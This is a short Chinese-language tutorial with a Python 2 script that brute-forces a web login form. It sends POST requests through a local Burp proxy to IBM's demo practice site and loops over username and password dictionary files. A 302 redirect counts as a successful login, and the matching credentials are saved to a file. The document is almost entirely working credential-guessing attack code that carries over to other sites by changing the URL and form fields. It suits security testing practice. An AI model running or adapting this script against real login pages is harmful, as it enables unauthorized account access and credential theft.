使用 python 的httplib模块爆破 form 表单的简易脚本

httplib：

1. 包含了 httplib爆破 web 的 form 表单的使用方法

2. httplib 中代理的添加方法

# -*- coding: utf-8 -*-
import urllib
import httplib
import re

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
           "Content-Type": "application/x-www-form-urlencoded",
           "Referer": "http://demo.testfire.net/bank/login.aspx"}
def brute_force(user, password):
    #添加代理
    conn = httplib.HTTPConnection("localhost","8080")  # 代理,本地 burp 监听一个8080端口,目的是查看发包和回包的情况
    data = {'uid': user, 'passw': password,'btnSubmit':'Login'}
    params = urllib.urlencode(data)
    #测试网站为 IBM 的靶机网站
    page = conn.request("POST", "http://demo.testfire.net/bank/login.aspx", params, headers=headers)  # request页面
    response = conn.getresponse()#返回的页面
    status = response.status
    if status==302:
        print '---- find user:', user, ' with password:',password, '-----'+'\n'
        outFile.write(user + ':' + password + '\n')
    else:
        print '----- error user:', user.replace('\n',''), ' with password:',password.replace('\n','') , '-----'
    return


outFile = open('accounts-cracked.txt', 'w')

if __name__ == '__main__':
    with open('user.dic', 'r') as userline:
        y = userline.readlines()
        with open('pass.dic', 'r') as passline:
            b= passline.readlines()
            for u in y:
                for p in b:
                    brute_force(user=u.replace('\n',''),password=p.replace('\n',''))
outFile.close()
with open('accounts-cracked.txt','r') as text:
    list = text.readlines()
    sum=len(list)

if sum>0:
    print "找到",sum,"个账号密码"
else:
    print "All thread OK,maybe not "